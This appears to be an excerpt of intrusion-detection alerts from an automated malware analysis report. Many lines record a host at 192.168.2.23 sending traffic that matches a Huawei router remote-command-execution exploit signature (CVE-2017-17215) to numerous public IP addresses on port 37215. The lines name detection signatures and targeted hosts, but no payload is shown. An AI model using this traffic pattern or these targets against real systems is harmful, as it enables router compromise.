          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:44768 -> 157.180.179.145:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:48686 -> 41.218.51.35:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:48686 -> 41.218.51.35:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:44414 -> 185.74.163.185:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:44414 -> 185.74.163.185:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:39230 -> 41.170.131.15:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:39230 -> 41.170.131.15:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:58474 -> 134.159.69.91:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:58474 -> 134.159.69.91:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:52640 -> 72.132.102.24:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:52640 -> 72.132.102.24:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:40048 -> 145.100.163.6:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:40048 -> 145.100.163.6:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:60088 -> 197.248.110.158:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:60088 -> 197.248.110.158:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:60136 -> 134.239.241.18:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:60136 -> 134.239.241.18:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:41346 -> 41.41.240.18:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:41346 -> 41.41.240.18:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:59926 -> 197.65.37.209:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:59926 -> 197.65.37.209:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:43154 -> 99.246.133.19:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:43154 -> 99.246.133.19:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:36894 -> 157.140.211.208:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:36894 -> 157.140.211.208:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:44410 -> 173.241.30.192:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:44410 -> 173.241.30.192:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:42112 -> 41.37.212.249:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:42112 -> 41.37.212.249:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:59814 -> 157.147.158.73:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:59814 -> 157.147.158.73:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:39258 -> 193.191.250.129:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:39258 -> 193.191.250.129:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:42510 -> 157.126.47.40:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:42510 -> 157.126.47.40:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:40402 -> 107.151.34.167:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:40402 -> 107.151.34.167:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:42030 -> 63.43.76.51:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:42030 -> 63.43.76.51:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:46140 -> 157.67.62.10:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:46140 -> 157.67.62.10:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:54506 -> 41.126.6.135:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:54506 -> 41.126.6.135:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:34766 -> 197.191.211.149:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:34766 -> 197.191.211.149:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:59122 -> 197.232.114.148:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:59122 -> 197.232.114.148:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:34112 -> 47.29.97.69:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:34112 -> 47.29.97.69:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:40228 -> 41.136.43.189:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:40228 -> 41.136.43.189:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:40220 -> 41.114.48.144:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:40220 -> 41.114.48.144:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:35084 -> 197.1.211.10:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:35084 -> 197.1.211.10:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:40746 -> 157.155.230.58:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:40746 -> 157.155.230.58:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:57948 -> 110.160.1.79:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:57948 -> 110.160.1.79:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:52544 -> 197.55.0.165:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:52544 -> 197.55.0.165:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:34646 -> 197.154.56.229:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:34646 -> 197.154.56.229:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:37766 -> 167.149.120.201:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:37766 -> 167.149.120.201:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:41492 -> 74.31.120.185:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:41492 -> 74.31.120.185:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:53188 -> 41.174.25.52:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:53188 -> 41.174.25.52:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:59470 -> 41.248.51.107:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:59470 -> 41.248.51.107:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:49040 -> 41.137.214.31:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:49040 -> 41.137.214.31:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:40392 -> 197.69.192.244:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:40392 -> 197.69.192.244:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:46418 -> 41.239.93.205:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:46418 -> 41.239.93.205:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:47174 -> 167.126.51.96:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:47174 -> 167.126.51.96:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:42674 -> 157.238.170.219:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:42674 -> 157.238.170.219:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:50840 -> 165.249.12.171:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:50840 -> 165.249.12.171:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:46076 -> 41.231.181.234:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:46076 -> 41.231.181.234:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:45772 -> 157.94.0.238:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:45772 -> 157.94.0.238:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:44952 -> 157.63.239.213:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:44952 -> 157.63.239.213:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:54796 -> 157.179.251.16:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:54796 -> 157.179.251.16:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:34116 -> 157.28.220.199:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:34116 -> 157.28.220.199:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:48022 -> 41.128.150.6:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:48022 -> 41.128.150.6:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:46132 -> 113.14.147.157:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:46132 -> 113.14.147.157:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:49598 -> 51.109.240.163:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:49598 -> 51.109.240.163:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:41132 -> 197.154.0.39:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:41132 -> 197.154.0.39:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:47830 -> 197.122.224.246:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:47830 -> 197.122.224.246:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:57900 -> 157.174.146.189:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:57900 -> 157.174.146.189:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:34276 -> 41.128.116.35:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:34276 -> 41.128.116.35:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:44416 -> 157.221.56.188:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:44416 -> 157.221.56.188:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:59900 -> 197.196.105.206:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:59900 -> 197.196.105.206:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:53202 -> 41.238.192.8:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:53202 -> 41.238.192.8:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:35088 -> 157.240.58.215:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:35088 -> 157.240.58.215:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:49158 -> 73.248.0.152:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:49158 -> 73.248.0.152:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:54002 -> 157.204.41.187:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:54002 -> 157.204.41.187:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:56760 -> 197.202.22.32:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:56760 -> 197.202.22.32:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:43218 -> 41.147.165.225:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:43218 -> 41.147.165.225:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:47300 -> 197.234.255.89:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:47300 -> 197.234.255.89:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:56800 -> 197.183.131.52:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:56800 -> 197.183.131.52:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:35974 -> 157.7.242.44:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:35974 -> 157.7.242.44:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:48626 -> 197.243.45.68:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:48626 -> 197.243.45.68:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:58694 -> 79.109.207.191:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:58694 -> 79.109.207.191:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:43206 -> 197.95.37.89:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:43206 -> 197.95.37.89:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:46948 -> 41.1.153.178:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:46948 -> 41.1.153.178:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:58066 -> 41.209.144.23:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:58066 -> 41.209.144.23:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:42524 -> 180.93.177.112:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:42524 -> 180.93.177.112:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:35732 -> 197.103.39.48:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:35732 -> 197.103.39.48:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:41988 -> 4.218.1.48:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:41988 -> 4.218.1.48:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:51094 -> 195.32.192.64:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:51094 -> 195.32.192.64:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:44032 -> 200.50.0.128:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:44032 -> 200.50.0.128:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:40662 -> 41.96.244.135:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:40662 -> 41.96.244.135:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:42904 -> 84.226.138.15:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:42904 -> 84.226.138.15:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:60848 -> 45.218.85.122:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:60848 -> 45.218.85.122:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:51408 -> 157.69.30.4:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:51408 -> 157.69.30.4:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:49630 -> 157.104.113.227:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:49630 -> 157.104.113.227:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:38800 -> 157.86.115.10:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:38800 -> 157.86.115.10:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:43234 -> 157.30.91.97:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:43234 -> 157.30.91.97:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:57014 -> 160.125.198.200:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:57014 -> 160.125.198.200:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:54512 -> 157.140.180.22:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:54512 -> 157.140.180.22:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:49512 -> 191.176.230.7:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:49512 -> 191.176.230.7:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:52700 -> 197.186.140.96:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:52700 -> 197.186.140.96:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:32950 -> 157.40.31.212:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:32950 -> 157.40.31.212:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:51550 -> 197.178.255.181:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:51550 -> 197.178.255.181:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:37672 -> 157.6.201.91:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:37672 -> 157.6.201.91:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:52576 -> 197.20.142.34:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:52576 -> 197.20.142.34:37215
